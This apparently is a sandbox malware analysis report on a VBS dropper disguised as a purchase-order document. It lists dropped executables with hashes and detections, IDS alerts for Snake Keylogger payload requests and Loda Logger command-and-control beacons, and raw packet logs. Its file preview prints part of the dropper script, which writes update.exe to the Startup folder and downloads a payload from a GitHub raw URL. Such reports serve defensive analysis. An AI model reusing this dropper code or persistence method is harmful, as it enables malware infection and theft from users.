                                                                                                                                                              SHA-512:3B0CF9FC65A9B950EC0B7DD9162F9902B6A2869980C13099DAAB0FA443B39E427B952E74537E527F4DEF4D7E7F2ABD8912C3CEE1DFA57B4FF2FA13EB91A1B007
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...HWjg.........."......P...........0.......@....@.......................................@...@.......@.........................$....@...............................................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFNCBO.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Wed Dec 25 07:07:15 2024, mtime=Wed Dec 25 07:07:15 2024, atime=Wed Dec 25 07:07:15 2024, length=916992, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1805
                                                                                                                                                              Entropy (8bit):3.404539266834532
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:8JUqLl+0WeFF2uxEAGD6jkrE2+s9T4IlRh4pCBm:8JfLfWNuF+br9MIlR3
                                                                                                                                                              MD5:235FB709C925B25DB5E1D044871E212D
                                                                                                                                                              SHA1:1577CF9F7F27A7FFC38E17BEE022361E2E62A6FF
                                                                                                                                                              SHA-256:C8626B427FC898A643E5D61FC926643CF90F4820AFF00CEF7A3F2DA292D2A762
                                                                                                                                                              SHA-512:02A28BBCCFF00FBD4438DC72571904EBB9F172A43F738EDCEB66CA068F1C8DF2FC6E1C1F2C8111D64B9984713A997D11376CEDD185A03F4B00DB2BF28B69556C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:L..................F.@.. ...E....V...E...V...E...V............................:..DG..Yr?.D..U..k0.&...&......vk.v....N...V..y....V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.@...........................%..A.p.p.D.a.t.a...B.V.1......Y.@..Roaming.@......CW.^.Y.@..............................R.o.a.m.i.n.g.....V.1......Y.@..Windata.@......Y.@.Y.@..........................v.`.W.i.n.d.a.t.a.....`.2......Y.@ .NUHORT.exe..F......Y.@.Y.@..........................@L..N.U.H.O.R.T...e.x.e.......`...............-......._...........C.6u.....C:\Users\user\AppData\Roaming\Windata\NUHORT.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.N.U.H.O.R.T...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1688576
                                                                                                                                                              Entropy (8bit):7.451847174682131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:MnsHyjtk2MYC5GDshloJfxBHUklI7GkBf:Mnsmtk2a5hliBHUklI66f
                                                                                                                                                              MD5:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                              SHA1:55E2550CE27991E708E30A2E75253093EED0EDB3
                                                                                                                                                              SHA-256:6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                                                                                                                                              SHA-512:F8013FB625BB6354B50D7C27331C3088904DDD9103E0B28BAC8965EDD83D86353250E97AA872B82756D2765064D5BE30E9E9579E216805C12216634627311A86
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................$....................@.......................... ...................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\Windata\NUHORT.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):916992
                                                                                                                                                              Entropy (8bit):7.852808153468323
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:fhloDX0XOf4toB7DIXELQqXqEep4lFycqGkZj:fhloJfxBHUklI7GkB
                                                                                                                                                              MD5:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                              SHA1:CEF294ECB4F41DD4970A918550084D30705A1A3B
                                                                                                                                                              SHA-256:F5E48B46D31D16B783F2C91A516562EA9AED19F1D4A6DE820962C6B9A592B2CE
                                                                                                                                                              SHA-512:3B0CF9FC65A9B950EC0B7DD9162F9902B6A2869980C13099DAAB0FA443B39E427B952E74537E527F4DEF4D7E7F2ABD8912C3CEE1DFA57B4FF2FA13EB91A1B007
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...HWjg.........."......P...........0.......@....@.......................................@...@.......@.........................$....@...............................................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                                              C:\Users\user\Documents\HTAGVDFUIE.xlsm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18387
                                                                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                              C:\Users\user\Documents\~$HTAGVDFUIE.xlsx

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                              MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                              C:\Users\user\Documents\~$cache1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):771584
                                                                                                                                                              Entropy (8bit):6.629891194746731
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                                                              MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                              SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                                                              SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                                                              SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                              Entropy (8bit):5.529143467566627
                                                                                                                                                              TrID:
                                                                                                                                                                File name:Purchase Order No. G02873362-Docx.vbs
                                                                                                                                                                File size:664 bytes
                                                                                                                                                                MD5:1ab2a527d0e4bd1f76f5467d6e2ea3dc
                                                                                                                                                                SHA1:9731d4f1fc6d6145aa9ed5243cb07b16f17d2f98
                                                                                                                                                                SHA256:115cf5a051098e7bd964d660b0ebead30d851cdbd06886ee2d47007889abae48
                                                                                                                                                                SHA512:2f9a7c422eade46177beff437f617d920b193c13ec4d6c8ea833a79d2523b98151bc02a79ce1bc50d8d4ed68087e3bae545ff028f0366220408a7b196f9d7976
                                                                                                                                                                SSDEEP:12:qLUAoh1Abs1vWdEV7wsnMG1oBHSDREMmfbc+spUmsfLHJ5xS0m4vXiajX9v:YZoMbs1AwnMG1UHSDWDccLvxSN4fvX9v
                                                                                                                                                                TLSH:8F016842CDD0C0DC0A2834F587C21D5AD1E110B873F98F350E90C45F38ED1434C959A7
                                                                                                                                                                File Content Preview:'<<< Coded By Mr.3amo>>> ..Set NcPiYXIs = CreateObject("WScript.Shell")..YpEVzTDI = NcPiYXIs.SpecialFolders("Startup") & "\update.exe"..'<<<<<<<<<<< code start >>>>>>>>>>>..On Error Resume Next..wscript.sleep 3000..call LkCZnKDq("https://raw.githubusercon

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-12-25T09:06:59.825228+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449753172.111.138.1005552TCP
                                                                                                                                                                2024-12-25T09:07:25.916571+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44974569.42.215.25280TCP
                                                                                                                                                                2024-12-25T09:07:26.099495+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449740142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:26.108839+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449741142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:27.246476+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.449753172.111.138.1005552TCP
                                                                                                                                                                2024-12-25T09:07:27.246476+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449753172.111.138.1005552TCP
                                                                                                                                                                2024-12-25T09:07:29.864974+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449755142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:29.870681+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449754142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:33.922381+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449766142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:33.923467+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449767142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:36.539383+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449774142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:36.549457+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449772142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:39.666676+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449784142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:39.667770+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449783142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:42.341155+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449790142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:42.357691+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449788142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:45.370596+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449801142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:45.373896+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449800142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:49.392235+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449811142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:49.395030+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449810142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:53.384741+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449821142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:53.456342+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449822142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:57.371609+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449831142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:07:57.376489+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449832142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:01.386686+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449852142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:01.399802+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449851142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:05.407778+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449870142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:05.417943+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449871142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:08.014451+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449883142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:08.015887+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449880142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:11.117118+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449897142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:11.123125+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449896142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:13.705640+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449904142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:13.726696+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449907142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:14.243532+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.449753TCP
                                                                                                                                                                2024-12-25T09:08:16.807097+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449926142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:16.816355+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449925142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:20.795906+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449944142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:20.803683+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449945142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:23.394098+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449954142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:23.397849+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449955142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:26.507057+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449969142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:26.510332+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449970142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:29.350572+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449981142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:29.434120+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449983142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:32.207709+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.450001142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:32.221715+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.450002142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:36.200626+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.450019142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:36.204733+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.450020142.250.181.14443TCP
                                                                                                                                                                2024-12-25T09:08:54.743495+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.449753TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 25, 2024 09:06:59.967883110 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:06:59.968022108 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:06:59.968111992 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:00.002408028 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:00.002458096 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.229391098 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.229528904 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.334985971 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.335037947 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.336010933 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.336139917 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.338819981 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.379373074 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.754462004 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.754590034 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.755762100 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.755846024 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.755868912 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.755923986 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.755961895 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.756015062 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.756051064 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.756103992 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.756135941 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.756184101 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.764065027 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.764152050 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.772342920 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.772413969 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.772433043 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.772488117 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.780736923 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.780807018 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.780870914 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.780925989 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.789118052 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.789185047 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.875432968 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.875513077 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.947714090 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.947815895 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.947848082 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.947909117 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.953078032 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.953170061 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.953190088 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.953252077 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.960732937 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.960800886 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.960834980 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.960890055 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.968802929 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.968864918 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.976259947 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.976325989 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.976402044 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.976459026 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.983990908 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.984049082 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.984118938 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.984170914 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.991684914 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.991746902 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.991787910 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.991858959 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.999450922 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.999511957 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:01.999582052 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:01.999636889 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.007205009 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.007280111 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.014936924 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.015002966 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.015022039 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.015089035 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.020797014 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.020865917 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.020950079 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.021004915 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.033229113 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:02.033307076 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                                Dec 25, 2024 09:07:02.033334017 CET44349730185.199.108.133192.168.2.4
